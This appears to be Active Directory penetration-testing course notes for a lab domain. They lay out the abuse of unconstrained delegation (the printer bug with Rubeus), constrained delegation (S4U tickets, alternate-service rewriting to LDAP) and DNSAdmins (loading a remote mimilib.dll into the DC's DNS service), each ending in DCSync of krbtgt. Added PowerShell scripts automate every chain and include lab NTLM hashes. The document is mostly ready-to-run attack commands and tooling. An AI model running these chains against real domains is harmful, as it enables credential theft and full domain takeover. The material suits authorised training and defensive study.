Domain Privilege Escalation
Unconstrained Delegation
Discover domain computers which have unconstrained delegation
enabled (domain controllers always have it set and will show up too; the
interesting hits are the other servers):
• Using PowerView:
Get-NetComputer -Unconstrained
• Using ActiveDirectory module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
We must trick or wait for a domain admin to connect to a service on
dcorp-appsrv. Invoke-UserHunter polls the server until the Administrator
has a session there:
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose
• Now, if the ticket export is run again on dcorp-appsrv (needs local
admin there), the DA's TGT is among the exported tickets:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
• The DA TGT can then be reused (Pass-the-Ticket):
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
Printerbug
We can capture the TGT of dcorp-dc$ by using Rubeus
(https://github.com/GhostPack/Rubeus) on the machine having unconstrained
delegation (dcorp-appsrv, needs local admin there), where it watches for
new TGTs every 5 seconds:
.\Rubeus.exe monitor /interval:5 /nowrap
• And after that run MS-RPRN.exe
(https://github.com/leechristensen/SpoolSample) on the student VM to make
the DC's Print Spooler authenticate to dcorp-appsrv (the Print Spooler
service must be running on dcorp-dc):
.\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
• Copy the base64 encoded TGT from the Rubeus monitor output, remove extra
spaces (if any) and use it on the student VM:
.\Rubeus.exe ptt /ticket:
• Once the ticket is injected, run DCSync (the DC machine account has the
replication rights DCSync needs):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
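The two procedures above (finding a server with unconstrained delegation, then coercing the DC's spooler to it) can be prepared from any domain-joined host without PowerView or RSAT. The following is an added example, not code from the course notes: it enumerates unconstrained delegation over plain LDAP with [adsisearcher], lists the domain controllers, and checks whether each DC exposes the spoolss named pipe, which is the precondition for the MS-RPRN.exe coercion. The hostnames dcorp-dc and dcorp-appsrv are the lab names from the notes; the userAccountControl bit values are the standard AD schema constants.

```powershell
# Added example, not part of the course notes. Enumerates unconstrained
# delegation over LDAP with [adsisearcher] (no PowerView or RSAT needed) and
# checks, for every domain controller, whether the Print Spooler pipe is
# reachable, which is what MS-RPRN.exe coercion relies on.
# Assumptions: run from a domain-joined host as any domain user.

# userAccountControl bits (standard AD schema values)
$TRUSTED_FOR_DELEGATION     = 0x80000   # unconstrained delegation
$SERVER_TRUST_ACCOUNT       = 0x2000    # domain controller computer account
$LDAP_MATCHING_RULE_BIT_AND = '1.2.840.113556.1.4.803'

function Invoke-LdapQuery {
    param([Parameter(Mandatory)][string]$Filter, [Parameter(Mandatory)][string[]]$Properties)
    $searcher = [adsisearcher]$Filter
    $searcher.PageSize = 500                     # paged results for large domains
    [void]$searcher.PropertiesToLoad.AddRange($Properties)
    foreach ($r in $searcher.FindAll()) {
        $o = [ordered]@{}
        # property keys in the result collection are lower-case; wrap in @() so
        # missing attributes become an empty array instead of throwing
        foreach ($p in $Properties) { $o[$p] = @($r.Properties[$p.ToLower()]) }
        [pscustomobject]$o
    }
}

function Get-UnconstrainedDelegation {
    # Accounts with TRUSTED_FOR_DELEGATION set, excluding DCs (every DC has the
    # bit, so they only add noise when hunting for delegation servers).
    $filter = "(&(userAccountControl:$LDAP_MATCHING_RULE_BIT_AND:=$TRUSTED_FOR_DELEGATION)" +
              "(!(userAccountControl:$LDAP_MATCHING_RULE_BIT_AND:=$SERVER_TRUST_ACCOUNT)))"
    Invoke-LdapQuery -Filter $filter -Properties sAMAccountName, dNSHostName, objectClass |
        ForEach-Object {
            [pscustomobject]@{
                SamAccountName = $_.sAMAccountName[0]
                DnsHostName    = $_.dNSHostName[0]     # empty for user accounts
                Type           = $_.objectClass[-1]    # most specific class: computer or user
            }
        }
}

function Get-DomainController {
    Invoke-LdapQuery -Filter "(userAccountControl:$LDAP_MATCHING_RULE_BIT_AND:=$SERVER_TRUST_ACCOUNT)" `
                     -Properties dNSHostName |
        ForEach-Object { $_.dNSHostName[0] }
}

function Test-SpoolerPipe {
    # The spooler exposes the \pipe\spoolss named pipe over SMB and any domain
    # user can look it up (the classic "ls \\dc\pipe\spoolss" check). No pipe
    # means the printer bug cannot be triggered against that host.
    param([Parameter(Mandatory)][string[]]$ComputerName)
    foreach ($c in $ComputerName) {
        $present = $false
        try {
            $present = [bool](Get-ChildItem -Path "\\$c\pipe\spoolss" -ErrorAction Stop)
        } catch { }   # pipe absent, host unreachable or SMB blocked: report as not present
        [pscustomobject]@{ ComputerName = $c; SpoolerPipe = $present }
    }
}

# Usage: pick the delegation server to run Rubeus monitor on, then confirm the
# DC can be coerced before launching MS-RPRN.exe against it.
Get-UnconstrainedDelegation | Format-Table -AutoSize
Test-SpoolerPipe -ComputerName (Get-DomainController) | Format-Table -AutoSize
```

A DC that shows SpoolerPipe = False has the spooler stopped or disabled, so MS-RPRN.exe will fail there and another coercion method is needed; the LDAP filter also surfaces user accounts with unconstrained delegation, which PowerView's Get-NetComputer does not.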
Constrained Delegation
Enumerate users and computers with constrained delegation enabled
• Using PowerView (dev)
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
• Using ActiveDirectory module:
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Either the plaintext password or the NTLM hash of the account that has
constrained delegation is required. We already have access to websvc's
hash from dcorp-adminsrv.
• Using asktgt from Kekeo, we request a TGT (steps 2 & 3 in the diagram):
kekeo# tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
• Using s4u from Kekeo, we request a TGS (steps 4 & 5), impersonating
Administrator to the service websvc is allowed to delegate to:
tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
• Using mimikatz, inject the ticket:
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
• To abuse constrained delegation using Rubeus, we can use the following
command (we are requesting a TGT and TGS in a single command):
.\Rubeus.exe s4u /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
Note that the impersonated user must be delegatable: an account marked
"sensitive and cannot be delegated" or a member of Protected Users cannot
be impersonated this way.
Either the plaintext password or the NTLM hash is required. If we have
access to the hash of the dcorp-adminsrv$ machine account (which is
allowed to delegate to the time service on the DC):
• Using asktgt from Kekeo, we request a TGT:
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67
• Using s4u from Kekeo_one (no SNAME validation): the service name in a
TGS is not part of the encrypted portion of the ticket, and time/dcorp-dc
and ldap/dcorp-dc are both served under the dcorp-dc$ key, so a ticket
obtained for the time service can be rewritten for ldap:
tgs::s4u /tgt:TGT_dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL
• Using mimikatz, inject the alternate-service (_ALT) ticket and run
DCSync:
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
• To abuse constrained delegation for dcorp-adminsrv$ using Rubeus, we
can use the following command (we are requesting a TGT and TGS in a
single command; /altservice swaps the service name to ldap):
.\Rubeus.exe s4u /user:dcorp-adminsrv$ /rc4:1fadb1b13edbc5a61cbdc389e6f34c67 /impersonateuser:Administrator /msdsspn:"time/dcorp-dc.dollarcorp.moneycorp.LOCAL" /altservice:ldap /ptt
• After injection, we can run DCSync:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
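The constrained delegation chain above (enumerate msDS-AllowedToDelegateTo, check that the user can be impersonated, then request S4U tickets with an alternate service) can be driven from one script. The following is an added example and not code from the course notes: it queries the delegation attributes with [adsisearcher], reports whether protocol transition is enabled (the TRUSTED_TO_AUTH_FOR_DELEGATION bit that PowerView's -TrustedToAuth filters on), groups the allowed SPNs by host, checks the target user for the "cannot be delegated" flag and Protected Users membership, and builds Rubeus s4u command lines. The /rc4 hash and account names in the usage are the lab values from the notes; the userAccountControl bit values are the standard AD schema constants.

```powershell
# Added example, not part of the course notes. Enumerates constrained
# delegation, checks the preconditions for S4U impersonation and prints
# Rubeus s4u command lines. Assumptions: domain-joined host, Rubeus from
# https://github.com/GhostPack/Rubeus, lab hashes/hostnames from the notes.

$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # "Use any authentication protocol" (protocol transition)
$NOT_DELEGATED                  = 0x100000    # "Account is sensitive and cannot be delegated"

function Get-ConstrainedDelegation {
    $searcher = [adsisearcher]'(msDS-AllowedToDelegateTo=*)'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName','userAccountControl','msDS-AllowedToDelegateTo'))
    foreach ($r in $searcher.FindAll()) {
        $uac  = [int]$r.Properties['useraccountcontrol'][0]
        $spns = @($r.Properties['msds-allowedtodelegateto'])
        # Each value is <service>/<host>[:<port>]. Any service class on the same
        # host is reachable, because the service name is not covered by the
        # ticket's encryption (the /altservice trick used in the notes).
        $hosts = $spns | ForEach-Object { (($_ -split '/')[1] -replace ':\d+$').ToLower() } | Sort-Object -Unique
        [pscustomobject]@{
            SamAccountName     = [string]$r.Properties['samaccountname'][0]
            ProtocolTransition = ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0
            AllowedSpns        = $spns
            TargetHosts        = @($hosts)
        }
    }
}

function Test-Delegatable {
    # S4U2Proxy is refused for users flagged NOT_DELEGATED or in Protected Users.
    # memberOf only lists direct membership, so nested membership is not caught here.
    param([Parameter(Mandatory)][string]$SamAccountName)
    $searcher = [adsisearcher]"(sAMAccountName=$SamAccountName)"
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('userAccountControl','memberOf'))
    $r = $searcher.FindOne()
    if (-not $r) { throw "$SamAccountName not found" }
    $uac       = [int]$r.Properties['useraccountcontrol'][0]
    $protected = @($r.Properties['memberof']) | Where-Object { $_ -like 'CN=Protected Users,*' }
    (($uac -band $NOT_DELEGATED) -eq 0) -and (-not $protected)
}

function New-RubeusS4UCommand {
    param(
        [Parameter(Mandatory)]$Delegation,                  # one object from Get-ConstrainedDelegation
        [Parameter(Mandatory)][string]$Rc4,                 # NTLM hash of the delegating account
        [string]$ImpersonateUser = 'Administrator',
        [string[]]$WantedServices = @('cifs','ldap','host') # extra service classes to rewrite into
    )
    if (-not $Delegation.ProtocolTransition) {
        # Without TRUSTED_TO_AUTH_FOR_DELEGATION the S4U2Self ticket is not
        # forwardable and the KDC rejects the S4U2Proxy step, so this chain fails.
        Write-Warning "$($Delegation.SamAccountName): protocol transition is off; S4U2Self will not yield a forwardable ticket"
    }
    if (-not (Test-Delegatable -SamAccountName $ImpersonateUser)) {
        Write-Warning "$ImpersonateUser cannot be delegated (NOT_DELEGATED flag or Protected Users)"
    }
    foreach ($spn in $Delegation.AllowedSpns) {
        $svc = (($spn -split '/')[0]).ToLower()
        # request the listed SPN; /altservice makes Rubeus issue copies for the other classes
        $alt = ($WantedServices | Where-Object { $_ -ne $svc }) -join ','
        $cmd = ".\Rubeus.exe s4u /user:$($Delegation.SamAccountName) /rc4:$Rc4 /impersonateuser:$ImpersonateUser /msdsspn:`"$spn`""
        if ($alt) { $cmd += " /altservice:$alt" }
        $cmd + ' /ptt'
    }
}

# Usage with the lab values from the notes
$all = Get-ConstrainedDelegation
$all | Format-Table SamAccountName, ProtocolTransition, TargetHosts -AutoSize
$all | Where-Object SamAccountName -eq 'dcorp-adminsrv$' |
    ForEach-Object { New-RubeusS4UCommand -Delegation $_ -Rc4 '1fadb1b13edbc5a61cbdc389e6f34c67' }
```

For dcorp-adminsrv$ this prints a command equivalent to the Rubeus line in the notes, with /altservice:cifs,ldap,host instead of only ldap; the warnings tell you beforehand whether the KDC will refuse the S4U2Proxy step, which saves a noisy failed attempt against the DC.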
DNSAdmins
Enumerate the members of the DNSAdmins group
• Using PowerView:
Get-NetGroupMember -GroupName "DNSAdmins"
• Using ActiveDirectory module:
Get-ADGroupMember -Identity DNSAdmins
From the privileges of a DNSAdmins group member, configure a DLL that the
DNS service (running as SYSTEM on the DC) loads at its next start, using
dnscmd.exe (needs RSAT DNS). The share must be readable by the dcorp-dc$
computer account, since that is the identity the DC uses on the network:
dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll
• Using DNSServer module (needs RSAT DNS):
$dnsettings = Get-DnsServerSetting -ComputerName dcorp-dc -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll"
Set-DnsServerSetting -InputObject $dnsettings -ComputerName dcorp-dc -Verbose
Restart the DNS service (assuming that the DNSAdmins group has the
permission to do so). In PowerShell, "sc" is an alias for Set-Content, so
call the executable explicitly:
sc.exe \\dcorp-dc stop dns
sc.exe \\dcorp-dc start dns
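The DNSServer-module steps above change a persistent server setting and bounce a DC service, so in practice you want the previous value recorded and the restart confirmed. The following is an added example, not code from the course notes: it wraps Get-/Set-DnsServerSetting in a function that returns the old ServerLevelPluginDll value for later restoration, and restarts the service with sc.exe while polling its state. It assumes RSAT DNS (the DnsServer module) on the operator host, a DNSAdmins member with rights to stop and start the DNS service, and a share at \\172.16.50.100\dll readable by the dcorp-dc$ computer account; that clearing the setting by writing an empty string restores the default is an assumption of this example.

```powershell
# Added example, not part of the course notes. Plants a ServerLevelPluginDll
# on a DNS server via the DnsServer module, keeps the previous value so it can
# be put back, and restarts the service with sc.exe while polling its state.
# Assumptions: RSAT DNS installed, caller can stop/start the remote DNS
# service, share readable by the DC computer account, and (assumed here)
# an empty ServerLevelPluginDll value clears the setting.

function Wait-DnsServiceState {
    param([Parameter(Mandatory)][string]$ComputerName,
          [Parameter(Mandatory)][ValidateSet('STOPPED','RUNNING')][string]$State,
          [int]$TimeoutSec = 30)
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    do {
        # sc.exe query prints a line such as "STATE : 4  RUNNING"
        $out = & sc.exe "\\$ComputerName" query dns
        if (($out -join "`n") -match "STATE\s+:\s+\d+\s+$State") { return $true }
        Start-Sleep -Seconds 1
    } while ((Get-Date) -lt $deadline)
    throw "DNS service on $ComputerName did not reach $State within $TimeoutSec s"
}

function Restart-RemoteDnsService {
    param([Parameter(Mandatory)][string]$ComputerName)
    # "sc" on its own is the Set-Content alias in PowerShell; call the executable explicitly.
    & sc.exe "\\$ComputerName" stop dns | Out-Null
    Wait-DnsServiceState -ComputerName $ComputerName -State STOPPED
    & sc.exe "\\$ComputerName" start dns | Out-Null
    Wait-DnsServiceState -ComputerName $ComputerName -State RUNNING
}

function Set-DnsServerPluginDll {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$DnsServer,
          [Parameter(Mandatory)][AllowEmptyString()][string]$DllPath,  # '' to clear (assumed)
          [switch]$Restart)
    $settings = Get-DnsServerSetting -ComputerName $DnsServer -All
    $previous = [string]$settings.ServerLevelPluginDll
    if ($PSCmdlet.ShouldProcess($DnsServer, "set ServerLevelPluginDll to '$DllPath' (was '$previous')")) {
        $settings.ServerLevelPluginDll = $DllPath
        Set-DnsServerSetting -InputObject $settings -ComputerName $DnsServer
        # the DLL is only loaded when the service starts, so restart to trigger it
        if ($Restart) { Restart-RemoteDnsService -ComputerName $DnsServer }
    }
    return $previous   # keep this to undo the change later
}

# Usage: plant the DLL, then put the original value back when done.
$original = Set-DnsServerPluginDll -DnsServer dcorp-dc -DllPath '\\172.16.50.100\dll\mimilib.dll' -Restart
# ... collect what the loaded DLL produces ...
Set-DnsServerPluginDll -DnsServer dcorp-dc -DllPath $original -Restart | Out-Null
```

Run with -WhatIf first to see the current value without changing anything; if the service does not come back RUNNING after the start, the most common cause is the DC being unable to read the DLL from the share under its computer account.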